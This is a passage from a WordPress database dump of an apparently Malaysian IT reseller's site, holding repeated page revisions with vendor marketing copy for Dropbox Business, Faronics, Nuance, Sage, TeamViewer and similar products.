versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-12 14:40:26','2018-12-12 06:40:26','',1473,'https://bintara.com.my/blog/2018/12/12/1473-revision-v1/',0,'revision','',0),(1895,1,'2018-12-12 14:39:01','2018-12-12 06:39:01','<h3><img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"517\" height=\"62\" /></h3>\r\n<h3 class=\"c42-page-header-level-2-plank__headline\">Business solutions</h3>\r\nYour time is precious. Plug Dropbox into your company\'s workflows to help make every minute count.\r\n<h3 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h3>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n&nbsp;\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-12 14:39:01','2018-12-12 06:39:01','',1473,'https://bintara.com.my/blog/2018/12/12/1473-revision-v1/',0,'revision','',0),(1896,1,'2018-12-12 14:39:09','2018-12-12 06:39:09','Portable Headsets. <a href=\"https://bintara.com.my/motorola/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1833\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','MOTOROLA','','inherit','closed','closed','','1405-autosave-v1','','','2018-12-12 14:39:09','2018-12-12 06:39:09','',1405,'https://bintara.com.my/blog/2018/12/12/1405-autosave-v1/',0,'revision','',0),(2122,1,'2018-12-14 09:17:35','2018-12-14 01:17:35','<h3><img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" /></h3>\r\n<h3 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h3>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-14 09:17:35','2018-12-14 01:17:35','',1473,'https://bintara.com.my/blog/2018/12/14/1473-revision-v1/',0,'revision','',0),(1898,1,'2019-09-30 11:22:49','2019-09-30 03:22:49','<div>\n<h2><strong>Faronics Product Solutions</strong></h2>\n\n<h3><strong>Deep Freeze</strong></h3>\nDeep Freeze makes workstation configurations indestructible. Guarantees 100% workstation recovery upon every restart.\n<h3><strong>Endpoint Management</strong></h3>\nComprehensive set of tools for deployment, management and monitoring usage of IT assets in your environment.\n<h3><strong>Security</strong></h3>\nSecurity solutions to enable your business to innovate, improve defences and reduce risk from toughest security threats.\n<h3><strong>Mobile</strong></h3>\nDetermine how mobile IT should be integrated with work processes and objectives in an enterprise environment.\n<h3><strong>Classroom Management</strong></h3>\nEffective classroom management tool that helps teachers create a better learning experience, while helping IT professionals manage multiple labs.\n\n&nbsp;\n<h2><strong>See what you can do with DF Cloud</strong></h2>\nItâ€™s the most complete set of enterprise solutions to protect, manage and optimize your IT assets, offered as a cloud suite.\n\n&nbsp;\n\n</div>\n<div><iframe src=\"https://www.youtube.com/embed/UNGDSKuDWew\" width=\"817\" height=\"354\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>','Faronics','','inherit','closed','closed','','1484-autosave-v1','','','2019-09-30 11:22:49','2019-09-30 03:22:49','',1484,'https://bintara.com.my/blog/2018/12/12/1484-autosave-v1/',0,'revision','',0),(2773,1,'2019-01-03 14:30:42','2019-01-03 06:30:42','<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h2>The right PDF solution for every need</h2>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h4>There are many options today, but only one makes sense: Nuance Power PDF</h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctlyâ€”at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.</p><h3>Nuance</h3>\n<h3>Print, capture &amp; PDF solutions</h3>\n<h3>Gain control of your documents</h3>\nNuance document imaging solutions keep your organization\'s most vital information private.\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\nPrint and scan securely with Nuance solutions.\n<h4>Industry compliance</h4>\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\n<h4>Seamless integration</h4>\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\n<h4>Workflow management</h4>\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\n<hr />\n<h3>A comprehensive portfolio for managing your documents</h3>\n<h4>Print management</h4>\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\n<h4>Document capture &amp; workflow</h4>\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\n<h4>Mobile Document Imaging</h4>\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\n<h4>PDF &amp; document conversion</h4>\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\n<h4>Cost recovery</h4>\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\n&nbsp;\n[maxbutton id=\"1\" ]','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2019-01-03 14:30:42','2019-01-03 06:30:42','',1555,'https://bintara.com.my/blog/2019/01/03/1555-revision-v1/',0,'revision','',0),(1899,1,'2019-09-23 15:44:21','2019-09-23 07:44:21','Create, edit, sign, and secure Portable Document Format (PDF) files and digital documents. <a href=\"http://bintara.com.my/nitro\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1834\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Nitro-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','KOFAX','','inherit','closed','closed','','1410-autosave-v1','','','2019-09-23 15:44:21','2019-09-23 07:44:21','',1410,'https://bintara.com.my/blog/2018/12/12/1410-autosave-v1/',0,'revision','',0),(2770,1,'2019-01-02 15:03:47','2019-01-02 07:03:47','Healthcare AI Solutions, Print, capture &amp; PDF Solutions. <a href=\"http://bintara.com.my/nuance\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1774\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Nuance-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','NUANCE','','inherit','closed','closed','','1411-autosave-v1','','','2019-01-02 15:03:47','2019-01-02 07:03:47','',1411,'https://bintara.com.my/blog/2019/01/02/1411-autosave-v1/',0,'revision','',0),(1903,1,'2018-12-12 14:51:50','2018-12-12 06:51:50','<div>\r\n<h3><strong>Faronics Product Solutions</strong></h3>\r\n<strong>Deep Freeze</strong>\r\n\r\nDeep Freeze makes workstation configurations indestructible. Guarantees 100% workstation recovery upon every restart.\r\n\r\n&nbsp;\r\n\r\n<strong>Endpoint Management</strong>\r\n\r\nComprehensive set of tools for deployment, management and monitoring usage of IT assets in your environment.\r\n\r\n&nbsp;\r\n\r\n<strong>Security</strong>\r\n\r\nSecurity solutions to enable your business to innovate, improve defences and reduce risk from toughest security threats.\r\n\r\n&nbsp;\r\n\r\n<strong>Mobile</strong>\r\n\r\nDetermine how mobile IT should be integrated with work processes and objectives in an enterprise environment.\r\n\r\n&nbsp;\r\n\r\n<strong>Classroom Management</strong>\r\n\r\nEffective classroom management tool that helps teachers create a better learning experience, while helping IT professionals manage multiple labs.\r\n\r\n&nbsp;\r\n<h3><strong>See what you can do with DF Cloud</strong></h3>\r\nItâ€™s the most complete set of enterprise solutions to protect, manage and optimize your IT assets, offered as a cloud suite.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div><iframe src=\"https://www.youtube.com/embed/UNGDSKuDWew\" width=\"817\" height=\"354\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>','Faronics','','inherit','closed','closed','','1484-revision-v1','','','2018-12-12 14:51:50','2018-12-12 06:51:50','',1484,'https://bintara.com.my/blog/2018/12/12/1484-revision-v1/',0,'revision','',0),(1901,1,'2018-12-12 14:47:34','2018-12-12 06:47:34','<h3>Faronics Product Solutions</h3>\r\n<h4 class=\"title\">Deep Freeze</h4>\r\n<div class=\"text\">Deep Freeze makes workstation configurations indestructible. Guarantees 100% workstation recovery upon every restart.</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title\">Endpoint Management</h4>\r\n<div class=\"text\">Comprehensive set of tools for deployment, management and monitoring usage of IT assets in your environment.</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title\">Security</h4>\r\n<div class=\"text\">Security solutions to enable your business to innovate, improve defences and reduce risk from toughest security threats.</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title\">Mobile</h4>\r\n<div class=\"text\">Determine how mobile IT should be integrated with work processes and objectives in an enterprise environment.</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title\">Classroom Management</h4>\r\n<div class=\"text\">Effective classroom management tool that helps teachers create a better learning experience, while helping IT professionals manage multiple labs.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3>See what you can do with DF Cloud</h3>\r\nItâ€™s the most complete set of enterprise solutions to protect, manage and optimize your IT assets, offered as a cloud suite.\r\n\r\n</div>\r\n<div><iframe src=\"https://www.youtube.com/embed/UNGDSKuDWew\" width=\"817\" height=\"354\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>','Faronics','','inherit','closed','closed','','1484-revision-v1','','','2018-12-12 14:47:34','2018-12-12 06:47:34','',1484,'https://bintara.com.my/blog/2018/12/12/1484-revision-v1/',0,'revision','',0),(1902,1,'2018-12-12 14:48:46','2018-12-12 06:48:46','Hyperconverged Infrastructure, Private Cloud Infrastructure. Read More...','NUTANIX','','inherit','closed','closed','','1413-autosave-v1','','','2018-12-12 14:48:46','2018-12-12 06:48:46','',1413,'https://bintara.com.my/blog/2018/12/12/1413-autosave-v1/',0,'revision','',0),(3547,1,'2019-09-30 11:21:01','2019-09-30 03:21:01','<div>\r\n<h2><strong>Faronics Product Solutions</strong></h2>\r\n<h3><strong>Deep Freeze</strong></h3>\r\nDeep Freeze makes workstation configurations indestructible. Guarantees 100% workstation recovery upon every restart.\r\n<h3><strong>Endpoint Management</strong></h3>\r\nComprehensive set of tools for deployment, management and monitoring usage of IT assets in your environment.\r\n<h3><strong>Security</strong></h3>\r\nSecurity solutions to enable your business to innovate, improve defences and reduce risk from toughest security threats.\r\n<h3><strong>Mobile</strong></h3>\r\nDetermine how mobile IT should be integrated with work processes and objectives in an enterprise environment.\r\n<h3><strong>Classroom Management</strong></h3>\r\nEffective classroom management tool that helps teachers create a better learning experience, while helping IT professionals manage multiple labs.\r\n\r\n&nbsp;\r\n<h2><strong>See what you can do with DF Cloud</strong></h2>\r\nItâ€™s the most complete set of enterprise solutions to protect, manage and optimize your IT assets, offered as a cloud suite.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div><iframe src=\"https://www.youtube.com/embed/UNGDSKuDWew\" width=\"817\" height=\"354\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>','Faronics','','inherit','closed','closed','','1484-revision-v1','','','2019-09-30 11:21:01','2019-09-30 03:21:01','',1484,'https://bintara.com.my/blog/2019/09/30/1484-revision-v1/',0,'revision','',0),(1904,1,'2018-12-12 14:52:35','2018-12-12 06:52:35','Office and Communication Solutions, Professional Camera, Visual System, Air Conditioning Systems. <a href=\"http://bintara.com.my/panasonic\">Read More...</a><!--more-->\n\n<img class=\"alignnone size-full wp-image-1836\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Panasonic-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','PANASONIC','','inherit','closed','closed','','1417-autosave-v1','','','2018-12-12 14:52:35','2018-12-12 06:52:35','',1417,'https://bintara.com.my/blog/2018/12/12/1417-autosave-v1/',0,'revision','',0),(1907,1,'2018-12-12 14:55:26','2018-12-12 06:55:26','Network Attached Storage (NAS). <a href=\"https://bintara.com.my/qnap/\">Read More...</a>\n\n<!--more-->\n\n&nbsp;','QNAP','','inherit','closed','closed','','1427-autosave-v1','','','2018-12-12 14:55:26','2018-12-12 06:55:26','',1427,'https://bintara.com.my/blog/2018/12/12/1427-autosave-v1/',0,'revision','',0),(2772,1,'2019-01-03 14:25:25','2019-01-03 06:25:25','<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h2>The right PDF solution for every need</h2>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h3>Nuance</h3>\n<h3>Print, capture &amp; PDF solutions</h3>\n<h3>Gain control of your documents</h3>\nNuance document imaging solutions keep your organization\'s most vital information private.\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\nPrint and scan securely with Nuance solutions.\n<h4>Industry compliance</h4>\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\n<h4>Seamless integration</h4>\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\n<h4>Workflow management</h4>\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\n<hr />\n<h3>A comprehensive portfolio for managing your documents</h3>\n<h4>Print management</h4>\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\n<h4>Document capture &amp; workflow</h4>\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\n<h4>Mobile Document Imaging</h4>\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\n<h4>PDF &amp; document conversion</h4>\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\n<h4>Cost recovery</h4>\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\n&nbsp;\n[maxbutton id=\"1\" ]','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2019-01-03 14:25:25','2019-01-03 06:25:25','',1555,'https://bintara.com.my/blog/2019/01/03/1555-revision-v1/',0,'revision','',0),(1911,1,'2018-12-12 15:00:20','2018-12-12 07:00:20','Business Cloud, Accounting Solutions, Business Management Solution, HR &amp; Payroll Software.\n\n<a href=\"https://bintara.com.my/sage/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1838\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Sage-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','SAGE','','inherit','closed','closed','','1431-autosave-v1','','','2018-12-12 15:00:20','2018-12-12 07:00:20','',1431,'https://bintara.com.my/blog/2018/12/12/1431-autosave-v1/',0,'revision','',0),(1912,1,'2018-12-12 14:59:57','2018-12-12 06:59:57','<h3>Nuance</h3>\r\n<h4>Print, capture &amp; PDF solutions</h4>\r\n<h4>Gain control of your documents</h4>\r\nNuance document imaging solutions keep your organization\'s most vital information private.\r\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\r\nPrint and scan securely with Nuance solutions.\r\n<h4>Industry compliance</h4>\r\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\r\n<h4>Seamless integration</h4>\r\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\r\n<h4>Workflow management</h4>\r\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\r\n\r\n<hr />\r\n\r\n<h4>Print management</h4>\r\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\r\n<h4>Document capture &amp; workflow</h4>\r\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\r\n<h4>Mobile Document Imaging</h4>\r\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2018-12-12 14:59:57','2018-12-12 06:59:57','',1555,'https://bintara.com.my/blog/2018/12/12/1555-revision-v1/',0,'revision','',0),(1914,1,'2018-12-12 15:04:13','2018-12-12 07:04:13','<h3>Nuance</h3>\r\n<h4>Print, capture &amp; PDF solutions</h4>\r\n<h4>Gain control of your documents</h4>\r\nNuance document imaging solutions keep your organization\'s most vital information private.\r\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\r\nPrint and scan securely with Nuance solutions.\r\n<h4>Industry compliance</h4>\r\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\r\n<h4>Seamless integration</h4>\r\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\r\n<h4>Workflow management</h4>\r\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\r\n\r\n<hr />\r\n\r\n<h3>A comprehensive portfolio for managing your documents</h3>\r\n<h4>Print management</h4>\r\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\r\n<h4>Document capture &amp; workflow</h4>\r\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\r\n<h4>Mobile Document Imaging</h4>\r\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\r\n<h4>PDF &amp; document conversion</h4>\r\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\r\n<h4>Cost recovery</h4>\r\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2018-12-12 15:04:13','2018-12-12 07:04:13','',1555,'https://bintara.com.my/blog/2018/12/12/1555-revision-v1/',0,'revision','',0),(1915,1,'2018-12-12 15:04:48','2018-12-12 07:04:48','<h2>Nuance</h2>\r\n<h3>Print, capture &amp; PDF solutions</h3>\r\n<h3>Gain control of your documents</h3>\r\nNuance document imaging solutions keep your organization\'s most vital information private.\r\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\r\nPrint and scan securely with Nuance solutions.\r\n<h4>Industry compliance</h4>\r\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\r\n<h4>Seamless integration</h4>\r\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\r\n<h4>Workflow management</h4>\r\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\r\n\r\n<hr />\r\n\r\n<h3>A comprehensive portfolio for managing your documents</h3>\r\n<h4>Print management</h4>\r\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\r\n<h4>Document capture &amp; workflow</h4>\r\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\r\n<h4>Mobile Document Imaging</h4>\r\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\r\n<h4>PDF &amp; document conversion</h4>\r\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\r\n<h4>Cost recovery</h4>\r\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2018-12-12 15:04:48','2018-12-12 07:04:48','',1555,'https://bintara.com.my/blog/2018/12/12/1555-revision-v1/',0,'revision','',0),(1920,1,'2018-12-12 15:11:56','2018-12-12 07:11:56','Remote Support, Remote Access, Service Desk\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1697\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-TV.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','TEAMVIEWER','','inherit','closed','closed','','1470-autosave-v1','','','2018-12-12 15:11:56','2018-12-12 07:11:56','',1470,'https://bintara.com.my/blog/2018/12/12/1470-autosave-v1/',0,'revision','',0),(1916,1,'2018-12-12 15:05:30','2018-12-12 07:05:30','<h2>Nuance</h2>\r\n<h3>Print, capture &amp; PDF solutions</h3>\r\n<h3>Gain control of your documents</h3>\r\nNuance document imaging solutions keep your organization\'s most vital information private.\r\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\r\nPrint and scan securely with Nuance solutions.\r\n<h4>Industry compliance</h4>\r\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\r\n<h4>Seamless integration</h4>\r\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\r\n<h4>Workflow management</h4>\r\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\r\n\r\n<hr />\r\n\r\n<h3>A comprehensive portfolio for managing your documents</h3>\r\n<h4>Print management</h4>\r\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\r\n<h4>Document capture &amp; workflow</h4>\r\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\r\n<h4>Mobile Document Imaging</h4>\r\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\r\n<h4>PDF &amp; document conversion</h4>\r\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\r\n<h4>Cost recovery</h4>\r\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" 